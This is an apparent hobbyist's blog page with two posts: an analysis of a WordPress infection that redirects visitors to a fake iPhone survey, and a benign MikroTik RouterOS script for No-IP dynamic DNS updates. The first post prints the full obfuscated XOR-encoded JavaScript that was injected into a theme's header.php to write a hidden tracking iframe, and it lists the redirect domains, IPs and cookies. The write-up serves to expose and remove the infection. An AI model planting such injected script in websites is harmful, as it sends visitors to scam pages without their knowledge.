giovedì 10 settembre 2015

A new WordPress infection: var a="'1Aqapkrv'02v...

Some days ago I met a malware which attacked a Wordpress based website of a friend of mine.
The symptom of the infection is clear: the first time you visit the home you get redirected to a fake online survey which promises you an Iphone. You can reach this page only once a day, if you use the same ip address.
Here a screenshot of the fake survey. Unidata is my ISP.
After an analys of the home page I found an hidden iframe that I didn't remeber to ever seen:
iframe height="0" src="c11n4.i.teaserguide.com/snitch?default_keyword=Home%20-%20Sito%&referrer=&se_referrer=&source=www.thesite.com" width="0" iframe
The domain teaserguide.com, registered by some Russian people acquires the name of the site and its address, probabily to track the infection. But who is writing this iframe?
At a first look through the code, I found the malevolent script inside the header.php of my theme (Avada child).

The script is encrypted and it looks like this:
var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);
Using a Javascript SandBox I was able to run the script and to verify that it is composing exactly the iframe of the home page.
Ok, perfect, infection found and removed, but... I want to discover some more and I went deeply using Wireshark.

What I found let me surprised. The redirection, in fact, passes through different sites and services, here listed:

Step 1:
 46.229.167.130    HTTP    606    GET /xzAx3?sid1=Test_Source1&sid2=c11n4.i.teaserguide.com&sid3=www.thesite.com
If we query that ip without compiling exactly the parameters of the GET, we see a return page composed by a single sentence: no found offer.
This suggest me that this service return different pages for different sites/requests.
 
Step 2:
HTTP    389    HTTP/1.1 302 Found  (text/html)[Malformed Packet]
bdvice.net/hs/?r=http://djsrp.com/c/41962/54197/?sid=&trx=60q5yyaxk2
Step 3:
46.229.167.130    HTTP    642    GET /hs/?r=http%3A%2F%2Fdjsrp.com%2Fc%2F41962%2F54197%2F%3Fsid%3D%26trx%3Dzc0ccua00t HTTP/1.1 
Step 4:
54.210.222.29    HTTP    452    GET /c/41962/54197/?sid=&trx=zc0ccua00t HTTP/1.1 
Step 5:
id06t.cleardefendlinked.com/?&s1=54197&s2=501595675-222617964-2065267263
This step is interesting because  the domain id06t.cleardefendlinked.com is hosted on the Amazon Cloud platform, as hidden service on: wsf11-1661233086.us-east-1.elb.amazonaws.com
Here we can find a service that offers you a redirect tool or, it is our case, a "Rotator Tool", which is able to rotate and split your link in different urls.
Our destination link will be:
Step 6:
  bMnzz.exclusiverewards.daqa.info/?sov=63633901&hid=hnljjpplnlpxp&redid=6958&gsid=68&id=XNSX.54197%3A%3A501595675%7C%7C222617964%7C%7C2065267263-r6958-t68
 This is the link with the fake online survey. The address is different from the image posted on the top of my post, because this has been reached in another moment, from a different pc.

Analyzing the traffic coming from this final site, we discover the repository for the code used to compose the fake online survey:
192.155.85.199    HTTP    312    GET /templates/_common/_templates/isp_survey_noselect_IT/css/style.css
/templates/_common/js/date/returnDate.it.js
/templates/_common/_templates/isp_survey_noselect_IT/js/script.js
/templates/_common/_templates/isp_survey_noselect_IT/images/logo_red.png
 The suffix IT suggested me that a customized version of the survey exists and in fact you can query styles and scripts also for different languages by changing the suffix.

Other sites connected to the redirection service are:

jvvzz.allnrgames.pocketmarble.science/?sov=63633901&hid=hxlpjrjhjhjrlpxp&redid=6958&gsid=68&id=XNSX.-r6958-t68
it.reimageplus.com/lp/slm/index.php?tracking=YTZ&banner=&adgroup=&ads_name=direct&keyword=direct&context=Co10k75n3p

You can enjoy trying different query to the amazon services.
Of course this analysis is a partial one, because I'm not a strong security researcher and the security world is only an hobby for me, like the web programming. (Sorry but I prefer embedded and desktop programming) :)

Anyway I want to end this story by reporting also the cookie that this site set and it is:
Cookie: log_63633901=1; noshid=hvpzlxjlhnlpxp; id=XNSX.54197%3A%3A501595675%7C%7C222617964%7C%7C2065267263-r6958-t68; SITE_ID=63633901; sov=63633901; mov=nr.ytsurvey.mini; redid=6958; gsid=68; URI=sov%3D63633901%26hid%3Dhnljjpplnlpxp%26redid%3D6958%26gsid%3D68%26id%3DXNSX.54197%253A%253A501595675%257C%257C222617964%257C%257C2065267263-r6958-t68; templateid=26191; path=isp_survey_noselect_IT; version=366255;

In case I'll find any news, I'll update the post, hoping that this will be useful to ban those sites and to remove these infections.


martedì 8 settembre 2015

RouterOs: update no-ip dynamic public address

This script shows a way to update the NO-Ip.com sevice with the public ip address of a RouterOs board installed inside a lan where the box is not directly exposed to the internet.
This script is based from different resources that I have combined to reach my goal.

Change the values of the first 3 variables with your proper configuration. 
# No-IP automatic Dynamic DNS update

#--------------- Change Values in this section to match your setup ------------------

# No-IP User account info
:local noipuser "no-ipUsername"
:local noippass "password"

# Set the hostname or label of network to be updated.
# Hostnames with spaces are unsupported. Replace the value in the quotations below with your host names.
# To specify multiple hosts, separate them with commas.
:local noiphost "myhost.ddns.net"


#------------------------------------------------------------------------------------
# No more changes need

/tool fetch url="http://myip.dnsomatic.com/" mode=http dst-path=mypublicip.txt
local ip [file get mypublicip.txt contents ]
put $ip

# The update URL. Note the "\3F" is hex for question mark (?). Required since ? is a special character in commands.
:local url "http://dynupdate.no-ip.com/nic/update\3Fmyip=$ip"
:local noiphostarray
:set noiphostarray [:toarray $noiphost]
:foreach host in=$noiphostarray do={
   :log info "No-IP: Sending update for $host"
   /tool fetch url=($url . "&hostname=$host") user=$noipuser password=$noippass mode=http dst-path=("no-ip_ddns_update-" . $host . ".txt")
   :log info "No-IP: Host $host updated on No-IP with IP $ip"
}
 
Credits:
c0d3rSh3ll from Mikrotik forum.
Mikrotik Wiki page